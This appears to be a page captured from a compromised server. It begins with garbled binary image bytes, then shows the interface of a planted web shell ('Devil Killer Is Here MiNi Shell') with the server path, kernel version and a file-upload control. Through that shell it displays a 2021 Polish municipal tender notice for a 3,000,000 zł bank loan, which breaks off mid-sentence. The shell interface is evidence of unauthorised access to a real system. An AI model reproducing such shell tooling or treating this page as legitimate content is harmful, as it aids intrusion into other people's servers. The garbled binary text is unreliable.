JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210622/0009076401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00090764 z dnia 2021-06-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zaciągnięcie kredytu długoterminowego w kwocie 3 000 000,00 złotych z przeznaczeniem na sfinansowanie planowanego deficytu budżetu oraz na spłatę wcześniej zaciągniętego długu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LIPNICA MUROWANA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660602</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipnica Murowana</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-724</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">14 68-52-100</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">14 68 52 102</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@lipnicamurowana.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lipnicamurowana.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zaciągnięcie kredytu długoterminowego w kwocie 3 000 000,00 złotych z przeznaczeniem na sfinansowanie planowanego deficytu budżetu oraz na spłatę wcześniej zaciągniętego długu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4de34eb6-d332-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00090764</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003997/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zaciągnięcie kredytu długoterminowego w kwocie 3 000 000,00 złotych z przeznaczeniem na sfinansowanie planowanego deficytu budżetu oraz na spłatę wcześniej zaciągniętego długu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/uglipnicamurowana,m,391802,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2.	W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zp@lipnicamurowana.pl ( z wyłączeniem składania ofert).<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>4.	Wymagania techniczne i organizacyjne wysłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z sytemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do : złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>6.	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7.	Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do SWZ. Dane postępowania można wyszukać również na liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Wójt Gminy Lipnica Murowana, 32-724 Lipnica Murowana 44;<br/>2)	kontakt z inspektorem ochrony danych osobowych w Gminie Lipnica Murowana, kontakt: odo@lipnicamurowana.pl; *<br/>Pozostałe informacje zawarto w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zawarto SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IWEiGP-ZP. 271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zaciągnięcie kredytu długoterminowego w kwocie <br/>3 000 000,00 złotych z przeznaczeniem na sfinansowanie planowanego deficytu budżetu oraz na spłatę wcześniej zaciągniętego długu.<br/>2.	Okres kredytowania od dnia podpisania umowy w 2021 r. do 31.12.2031 r.<br/>3.	Karencja w spłacie rat kapitałowych kredytu do 30.01.2024 r.<br/>4.	Do wyliczenia kosztu obsługi kredytu przyjmuje się uruchomienie trzech szacunkowych transz:<br/>I transza w dniu 20.08.2021 r. w kwocie 800 000,00 zł,<br/>II transza w dniu 22.10.2021 r. w kwocie 900 000,00 zł,<br/>III transza w dniu 17.12.2021 r. w kwocie 1 300 000,00 zł.<br/>5.	Do obliczenia ceny kredytu przyjmuje się WIBOR 1M notowany na dzień 31.05.2021 r. oraz marżę banku.<br/>6.	Spłata kredytu od dnia 31.01.2024 r. do 31.12.2031 r. w 96 ratach miesięcznych <br/>(w ostatnim dniu roboczym miesiąca) w terminach i kwotach:<br/><br/>31 styczeń 2024 r.	20 400,00<br/>29 luty 2024 r. 20 400,00<br/>29 marzec 2024 r.	20 400,00<br/>30 kwiecień 2024 r.	20 400,00<br/>31 maj 2024 r. 20 400,00<br/>28 czerwiec 2024 r.	20 400,00<br/>31 lipiec 2024 r. 20 400,00<br/>30 sierpień 2024 r.	20 400,00<br/>30 wrzesień 2024 r.	20 400,00<br/>31 październik 2024 r.	20 400,00<br/>29 listopad 2024 r.	20 400,00<br/>31 grudzień 2024 r.	20 400,00<br/>31 styczeń 2025 r.	21 600,00<br/>28 luty 2025 r. 21 600,00<br/>31 marzec 2025 r.	21 600,00<br/>30 kwiecień 2025 r.	21 600,00<br/>30 maj 2025 r. 21 600,00<br/>30 czerwiec 2025 r.	21 600,00<br/>31 lipiec 2025 r. 21 600,00<br/>29 sierpień 2025 r.	21 600,00<br/>30 wrzesień 2025 r.	21 600,00<br/>31 październik 2025 r.	21 600,00<br/>28 listopad 2025 r.	21 600,00<br/>31 grudzień 2025 r.	21 600,00<br/>30 styczeń 2026 r.	21 600,00<br/>27 luty 2026 r. 21 600,00<br/>31 marzec 2026 r.	21 600,00<br/>30 kwiecień 2026 r.	21 600,00<br/>29 maj 2026 r. 21 600,00<br/>30 czerwiec 2026 r.	21 600,00<br/>31 lipiec 2026 r. 21 600,00<br/>31 sierpień 2026 r.	21 600,00<br/>30 wrzesień 2026 r.	21 600,00<br/>30 październik 2026 r.	21 600,00<br/>30 listopad 2026 r.	21 600,00<br/>31 grudzień 2026 r.	21 600,00<br/>29 styczeń 2027 r.	21 600,00<br/>26 luty 2027 r. 21 600,00<br/>31 marzec 2027 r.	21 600,00<br/>30 kwiecień 2027 r.	21 600,00<br/>31 maj 2027 r. 21 600,00<br/>30 czerwiec 2027 r.	21 600,00<br/>30 lipiec 2027 r. 21 600,00<br/>31 sierpień 2027 r.	21 600,00<br/>30 wrzesień 2027 r.	21 600,00<br/>29 październik 2027 r.	21 600,00<br/>30 listopad 2027 r.	21 600,00<br/>31 grudzień 2027 r.	21 600,00<br/>31 styczeń 2028 r.	21 600,00<br/>29 luty 2028 r. 21 600,00<br/>31 marzec 2028 r.	21 600,00<br/>28 kwiecień 2028 r.	21 600,00<br/>31 maj 2028 r. 21 600,00<br/>30 czerwiec 2028 r.	21 600,00<br/>31 lipiec 2028 r. 21 600,00<br/>31 sierpień 2028 r.	21 600,00<br/>29 wrzesień 2028 r.	21 600,00<br/>31 październik 2028 r.	21 600,00<br/>30 listopad 2028 r.	21 600,00<br/>29 grudzień 2028 r.	21 600,00<br/>31 styczeń 2029 r.	21 600,00<br/>28 luty 2029 r. 21 600,00<br/>30 marzec 2029 r.	21 600,00<br/>30 kwiecień 2029 r.	21 600,00<br/>31 maj 2029 r. 21 600,00<br/>29 czerwiec 2029 r.	21 600,00<br/>31 lipiec 2029 r. 21 600,00<br/>31 sierpień 2029 r.	21 600,00<br/>28 wrzesień 2029 r.	21 600,00<br/>31 październik 2029 r.	21 600,00<br/>30 listopad 2029 r.	21 600,00<br/>31 grudzień 2029 r.	21 600,00<br/>31 styczeń 2030 r.	21 600,00<br/>28 luty 2030 r. 21 600,00<br/>29 marzec 2030 r.	21 600,00<br/>30 kwiecień 2030 r.	21 600,00<br/>31 maj 2030 r. 21 600,00<br/>28 czerwiec 2030 r.	21 600,00<br/>31 lipiec 2030 r. 21 600,00<br/>30 sierpień 2030 r.	21 600,00<br/>30 wrzesień 2030 r.	21 600,00<br/>31 październik 2030 r.	21 600,00<br/>29 listopad 2030 r.	21 600,00<br/>31 grudzień 2030 r.	21 600,00<br/>31 styczeń 2031 r.	100 000,00<br/>28 luty 2031 r. 100 000,00<br/>31 marzec 2031 r.	100 000,00<br/>30 kwiecień 2031 r.	100 000,00<br/>30 maj 2031 r. 100 000,00<br/>30 czerwiec 2031 r.	100 000,00<br/>31 lipiec 2031 r. 100 000,00<br/>29 sierpień 2031 r.	100 000,00<br/>30 wrzesień 2031 r.	100 000,00<br/>31 październik 2031 r.	100 000,00<br/>28 listopad 2031 r.	100 000,00<br/>31 grudzień 2031 r.	100 000,00<br/><br/>7.	Spłata odsetek na bieżąco w terminach miesięcznych (w ostatnim dniu roboczym miesiąca). Odsetki będą naliczane od kwoty rzeczywistego zadłużenia, według rzeczywistej liczby dni występujących w danym roku (365/366 dni).<br/>8.	O wysokości odsetek Zamawiający będzie informowany elektronicznie na adres: gmina@lipnicamurowana.pl najpóźniej na trzy dni przed terminem płatności.<br/>9.	Zabezpieczenie kredytu stanowi weksel własny in blanco wraz z deklaracją wekslową.<br/>10.	Na wekslu i deklaracji wekslowej oraz na umowie kredytowej zostanie złożona kontrasygnata Skarbnika Gminy.<br/>11.	Wysokość i termin przekazania środków będą każdorazowo uzgodnione z Wykonawcą <br/>i przedkładane w postaci wniosku przed uruchomieniem transzy oraz przelewane na rachunek bankowy nr 04 85890006 0230 0000 0837 0006 prowadzony w BSR w Krakowie Oddział w Nowym Wiśniczu.<br/>12.	Ostateczny termin wykorzystania kredytu ustala się na dzień 30.12.2021 r.<br/>13.	Kredyt udzielony w oparciu o zmienną stopę procentową na podstawie stawki referencyjnej WIBOR 1M, powiększonej o oferowaną marżę banku. Przez okres spłaty kredytu oferowana marża nie może zostać podwyższona. Zmiana oprocentowania kredytu dokonywana będzie miesięcznie w pierwszym dniu roboczym każdego miesiąca w oparciu o stawkę WIBOR 1M obowiązującą w ostatnim dniu roboczym poprzedniego miesiąca.<br/>14.	Nie przewiduje się dodatkowych prowizji, opłat i innych świadczeń za administrowanie kredytem.<br/>15.	Zamawiający zastrzega możliwość skrócenia okresu spłaty kredytu oraz do niewykorzystania całości kwoty kredytu, zmiany terminów wypłaty poszczególnych transz kredytu oraz przesunięcia terminów spłat rat kredytu.<br/>16.	W przypadku niewykorzystania przez Zamawiającego części kredytu lub dokonania wcześniejszej spłaty części kredytu, Strony ustalą nowy harmonogram spłaty w formie aneksu do umowy.<br/>17.	Zamawiający z tytułu niewykorzystania kwoty kredytu w całości nie będzie ponosił dodatkowych kosztów (opłat, prowizji).<br/>18.	Na rachunkach bankowych Gminy nie ciążą zajęcia egzekucyjne. Gmina nie posiada zaległych zobowiązań w bankach.<br/>19.	Nie przewiduje się dokumentowania wykorzystania kredytu.<br/>20.	Inne dokumenty nie załączone do specyfikacji warunków zamówienia a wymagane przez bank, który wygra przetarg, zostaną doręczone przed podpisaniem umowy kredytowej.<br/>21.	Podpisanie umowy kredytowej odbędzie się w siedzibie Zamawiającego.<br/>22.	W trakcie niniejszego postępowania przetargowego zamawiający nie będzie wytwarzał dla Wykonawców żadnych dokumentów do oceny zdolności kredytowej, oprócz stanowiących załączniki do niniejszej SWZ, gdyż wszelkie informacje, w tym o wielkości budżetu i uchwałach podejmowanych przez Radę Gminy są zamieszczone w Biuletynie Informacji Publicznej (www.lipnicamurowana.pl), a jednocześnie banki dysponują Biuletynem Informacji Kredytowej.<br/>23.	Wykonawca zobowiązany jest do dostarczenia Zamawiającemu projektu umowy przed jej podpisaniem. Projekt musi być zgodny z warunkami określonymi w SWZ oraz musi zostać zaakceptowany przez Zamawiającego. Zamawiający zastrzega sobie możliwość wprowadzenia zmian do tego projektu przed podpisaniem umowy w ostatecznej wersji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2031-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>cena ofertowa - 60<br/>termin uruchomienia transz - 40<br/>1)	Cena oferty – 60<br/>Ocena punktowa w tym kryterium zostanie dokonana zgodnie z poniższą formułą: <br/> <br/>ilość punktów dla kryterium ceny oferty = ( najniższa cena brutto<br/>z rozpatrywanych ofert / cena brutto oferty rozpatrywanej) x 60 pkt <br/> <br/><br/>2)	Termin uruchomienia transz – 40<br/>Kryterium termin uruchomienia transz – punkty będą przyznane gdy Wykonawca zaoferuje <br/>w formularzu oferty termin uruchomienia transz krótszy niż 4 dni od dnia przekazania wniosku (poniżej wymaganego maksymalnego terminu) tj.: dla zakresu 1 dnia od dnia przekazania wniosku ≤ termin uruchomienia transz zaproponowany przez Wykonawcę ≤ 4 dni od dnia przekazania wniosku.<br/>Zamawiający w tym kryterium przyzna następująca punktację:<br/>Termin uruchomienia transz wynoszący 4 dni od dnia przekazania wniosku – 0 punktów<br/>Termin uruchomienia transz wynoszący 3 dni od dnia przekazania wniosku – 10 punktów<br/>Termin uruchomienia transz wynoszący 2 dni od dnia przekazania wniosku – 25 punktów<br/>Termin uruchomienia transz wynoszący 1 dzień od dnia przekazania wniosku – 40 punktów<br/>Maksymalna liczba punktów za kryterium termin uruchomienia transz jaką może otrzymać Wykonawca to 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin uruchomienia transz</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu<br/>i spełniają warunki w postępowaniu w następującym zakresie:<br/>1. Zdolności do występowania w obrocie gospodarczym.<br/>Określenie warunków: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Określenie warunków: <br/>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że posiada zezwolenie na prowadzenie działalności bankowej a także realizacji usług objętych przedmiotem zamówienia zgodnie z przepisami ustawy z dnia 29.08.1997 r. Prawo bankowe (Dz. U. z 2020 poz. 1896 z późn. zm.) a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy.<br/>3. Sytuacja ekonomiczna lub finansowa:<br/>Określenie warunków: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4. Zdolności technicznej lub zawodowej<br/>Określenie warunków: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsu-mentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej sa-mej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, ofer-ty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie 